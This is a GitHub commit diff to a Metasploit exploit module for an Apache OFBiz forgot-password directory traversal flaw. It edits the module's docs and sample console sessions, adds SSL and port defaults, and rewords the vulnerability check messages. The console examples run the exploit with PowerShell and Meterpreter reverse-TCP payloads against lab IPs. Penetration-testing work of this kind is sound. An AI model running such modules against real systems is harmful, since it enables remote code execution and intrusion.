Added default options fixed Verification Steps

jheysel-r7 · Jun 7, 2024 · 48b3b07 · 48b3b07
1 parent 1703ae6
commit 48b3b07
Show file tree

Hide file tree

Showing 2 changed files with 12 additions and 7 deletions.
diff --git a/.../modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md b/.../modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md
@@ -51,12 +51,13 @@ This is why, at the time of writing, a PowerShell payload must be used when expl
 ## Verification Steps
 
 1. Start msfconsole
-1. Do: `use `
-1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Do: `use apache_ofbiz_forgot_password_directory_traversal`
+1. Set the `RHOST` and `LHOST` options
 1. Run the module
-1. Receive a Meterpreter session as the `root` user.
+1. Receive a session in the context of the user running Apache OFBiz.
 
 ## Scenarios
+
 ### Apache OFBiz 18.12.12 running on Windows 10 (Build 19045)
 ```
 msf6 > use apache_ofbiz_forgot_password_directory_traversal
@@ -79,7 +80,7 @@ After interacting with a module you can manually set a TARGET with set TARGET 'W
 msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > use 2
 [*] Additionally setting TARGET => Windows Command
 [*] Using configured payload cmd/windows/powershell_reverse_tcp
-msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run rhosts=172.16.199.132 lhost=172.16.199.1 rport=8443 ssl=true
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run rhosts=172.16.199.132 lhost=172.16.199.1
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -98,7 +99,7 @@ OS Version:                10.0.19045 N/A Build 19045
 
 ### Apache OFBiz 18.12.12 running in Docker on MacOS 14.5
 ```
-msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run target=0 payload=cmd/linux/http/x64/meterpreter/reverse_tcp rhosts=172.16.199.1 lhost=172.16.199.1 rport=8443 ssl=true 
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run target=0 payload=cmd/linux/http/x64/meterpreter/reverse_tcp rhosts=172.16.199.1 lhost=172.16.199.1
 
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)

diff --git a/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb b/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
@@ -63,6 +63,10 @@ def initialize(info = {})
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, ],
           'Reliability' => [ REPEATABLE_SESSION, ]
+        },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8443
         }
       )
     )
@@ -95,10 +99,10 @@ def check
     return CheckCode::Unknown('Target did not respond to check.') unless res
 
     unless res.get_html_document&.xpath("//div[@class='content-messages errorMessage' and .//p[contains(text(), 'java.lang.Exception: #{echo_test_string}')]]")&.empty?
-      return CheckCode::Vulnerable('Tested command injection successfully')
+      return CheckCode::Vulnerable('Tested remote code execution successfully')
     end
 
-    CheckCode::Safe
+    CheckCode::Safe('Attempting to exploit vulnerability failed.')
   end
 
   def to_unicode_escape(str)